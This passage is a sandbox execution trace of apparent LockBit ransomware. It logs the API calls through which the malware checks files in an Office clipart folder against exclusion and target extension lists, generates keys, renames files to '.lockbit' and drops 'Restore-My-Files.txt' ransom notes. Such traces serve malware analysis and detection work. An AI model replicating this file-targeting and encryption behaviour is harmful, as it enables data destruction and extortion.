[0153.019] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0153.019] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0153.019] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0153.019] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0153.019] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0153.019] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0153.019] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0153.019] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0153.019] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.019] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0153.019] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0153.019] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0153.019] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0153.020] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0153.020] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0153.020] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0153.020] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0153.020] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0153.020] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0153.020] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0153.020] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0153.020] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0153.020] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0153.020] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0153.020] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0153.020] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0153.020] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.020] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0153.020] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0153.020] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0153.020] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0153.020] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0232395.WMF") returned 1 [0153.020] lstrcmpiW (lpString1="ntldr", lpString2="J0232395.WMF") returned 1 [0153.020] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0232395.WMF") returned 1 [0153.020] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0232395.WMF") returned -1 [0153.021] lstrcmpiW (lpString1="autorun.inf", lpString2="J0232395.WMF") returned -1 [0153.021] lstrcmpiW (lpString1="thumbs.db", lpString2="J0232395.WMF") returned 1 [0153.021] lstrcmpiW (lpString1="iconcache.db", lpString2="J0232395.WMF") returned -1 [0153.021] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0153.021] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0232395.WMF") returned=".WMF" [0153.021] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0153.021] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0153.021] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0153.021] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0153.021] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0153.021] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0153.021] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0153.021] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0153.021] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0153.021] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0153.021] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0153.021] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0153.021] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0153.021] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0153.021] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0153.021] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0153.022] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0153.022] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0153.022] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0153.022] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0153.022] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0153.022] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0153.022] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0153.022] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0153.022] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0153.022] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0153.022] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0153.022] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0153.022] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0232395.WMF.lockbit") returned 72 [0153.022] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0232395.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0232395.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0153.023] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0153.023] malloc (_Size=0x40068) returned 0x1ff1e60 [0153.023] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=41094) returned 1 [0153.023] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.024] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.024] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0153.024] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.024] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.024] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0153.024] ReadFile (in: hFile=0xec, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0153.128] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0232395.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0232395.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0153.128] malloc (_Size=0xa6) returned 0x1fa2ed8 [0153.128] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0153.128] free (_Block=0x1fa2ed8) [0153.128] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0232395.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0153.128] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0153.128] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0153.128] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5779c00, ftCreationTime.dwHighDateTime=0x1be05ef, ftLastAccessTime.dwLowDateTime=0x660a4230, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5779c00, ftLastWriteTime.dwHighDateTime=0x1be05ef, nFileSizeHigh=0x0, nFileSizeLow=0x380a, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0232795.WMF", cAlternateFileName="")) returned 1 [0153.128] lstrcmpiW (lpString1=".", lpString2="J0232795.WMF") returned -1 [0153.128] lstrcmpiW (lpString1="..", lpString2="J0232795.WMF") returned -1 [0153.128] PathFindExtensionW (pszPath="J0232795.WMF") returned=".WMF" [0153.128] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0153.128] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0153.128] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0153.128] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0153.129] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0153.129] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0153.129] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0153.129] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0153.129] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0153.129] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0153.129] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0153.129] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0153.129] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0153.129] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0153.129] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0153.129] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0153.129] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0153.129] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0153.129] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0153.129] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0153.129] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0153.129] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0153.129] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0153.129] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0153.129] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.129] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0153.129] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0153.129] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0153.129] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0153.129] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0153.129] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0153.129] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0153.129] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0153.129] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0153.129] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0153.130] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0153.130] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0153.130] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0153.130] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0153.130] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0153.130] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0153.130] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0153.130] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.130] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0153.130] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0153.130] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0153.130] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0153.130] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0232795.WMF") returned 1 [0153.130] lstrcmpiW (lpString1="ntldr", lpString2="J0232795.WMF") returned 1 [0153.130] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0232795.WMF") returned 1 [0153.130] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0232795.WMF") returned -1 [0153.130] lstrcmpiW (lpString1="autorun.inf", lpString2="J0232795.WMF") returned -1 [0153.130] lstrcmpiW (lpString1="thumbs.db", lpString2="J0232795.WMF") returned 1 [0153.130] lstrcmpiW (lpString1="iconcache.db", lpString2="J0232795.WMF") returned -1 [0153.130] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0153.130] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0232795.WMF") returned=".WMF" [0153.130] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0153.130] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0153.130] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0153.130] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0153.130] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0153.130] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0153.130] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0153.130] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0153.130] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0153.130] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0153.130] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0153.131] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0153.131] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0153.131] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0153.131] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0153.131] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0153.131] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0153.131] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0153.131] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0153.131] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0153.131] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0153.131] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0153.131] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0153.131] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0153.131] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0153.131] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0153.131] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0153.131] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0153.131] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0232795.WMF.lockbit") returned 72 [0153.131] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0232795.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0232795.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0153.132] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0153.132] malloc (_Size=0x40068) returned 0x3df0008 [0153.132] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=14346) returned 1 [0153.132] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.133] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.133] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0153.133] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.133] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.133] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0153.133] ReadFile (in: hFile=0xec, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0153.136] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0232795.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0232795.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0153.136] malloc (_Size=0xa6) returned 0x1fa2ed8 [0153.136] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0153.137] free (_Block=0x1fa2ed8) [0153.137] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0232795.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0153.137] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0153.137] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0153.137] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6d7d00, ftCreationTime.dwHighDateTime=0x1be05ef, ftLastAccessTime.dwLowDateTime=0x660a4230, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb6d7d00, ftLastWriteTime.dwHighDateTime=0x1be05ef, nFileSizeHigh=0x0, nFileSizeLow=0x899c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0232797.WMF", cAlternateFileName="")) returned 1 [0153.137] lstrcmpiW (lpString1=".", lpString2="J0232797.WMF") returned -1 [0153.138] lstrcmpiW (lpString1="..", lpString2="J0232797.WMF") returned -1 [0153.138] PathFindExtensionW (pszPath="J0232797.WMF") returned=".WMF" [0153.138] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0153.138] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0153.138] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0153.138] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0153.138] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0153.138] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0153.138] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0153.138] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0153.138] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0153.138] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0153.138] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0153.138] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0153.138] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0153.138] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0153.138] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0153.138] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0153.138] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0153.138] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0153.138] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0153.138] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0153.138] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0153.138] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0153.138] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0153.138] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0153.138] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.138] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0153.138] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0153.138] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0153.139] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0153.139] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0153.139] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0153.139] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0153.139] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0153.139] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0153.139] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0153.139] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0153.139] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0153.139] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0153.139] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0153.139] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0153.139] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0153.139] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0153.139] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.139] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0153.139] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0153.139] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0153.139] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0153.139] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0232797.WMF") returned 1 [0153.139] lstrcmpiW (lpString1="ntldr", lpString2="J0232797.WMF") returned 1 [0153.139] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0232797.WMF") returned 1 [0153.139] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0232797.WMF") returned -1 [0153.139] lstrcmpiW (lpString1="autorun.inf", lpString2="J0232797.WMF") returned -1 [0153.139] lstrcmpiW (lpString1="thumbs.db", lpString2="J0232797.WMF") returned 1 [0153.140] lstrcmpiW (lpString1="iconcache.db", lpString2="J0232797.WMF") returned -1 [0153.140] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0153.140] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0232797.WMF") returned=".WMF" [0153.140] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0153.140] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0153.140] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0153.140] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0153.140] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0153.140] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0153.140] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0153.140] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0153.140] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0153.140] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0153.140] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0153.140] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0153.140] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0153.140] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0153.140] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0153.140] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0153.140] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0153.140] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0153.140] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0153.140] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0153.140] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0153.140] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0153.140] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0153.141] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0153.141] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0153.141] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0153.141] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0153.141] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0153.141] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0232797.WMF.lockbit") returned 72 [0153.141] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0232797.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0232797.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0153.142] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0153.142] malloc (_Size=0x40068) returned 0x1ff1e60 [0153.142] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=35228) returned 1 [0153.142] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.142] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.142] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0153.142] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.143] GetProcAddress 